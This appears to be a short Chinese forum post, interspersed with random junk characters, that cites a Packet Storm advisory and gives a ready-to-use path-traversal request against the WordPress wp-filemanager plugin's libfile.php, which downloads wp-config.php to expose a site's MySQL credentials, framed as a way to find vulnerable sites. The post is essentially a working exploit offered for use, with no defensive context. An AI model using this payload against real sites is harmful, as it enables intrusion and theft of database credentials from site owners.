洞详解:http://packetstormsecurity.com/f ... -File-Download.html, |) J, c7 x( ], S% q( T: ]' ]
1 Z% w# I$ f" o/ N7 o8 d( L; p
查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。8 @1 k' @- _% N# Y3 l7 ?: [
|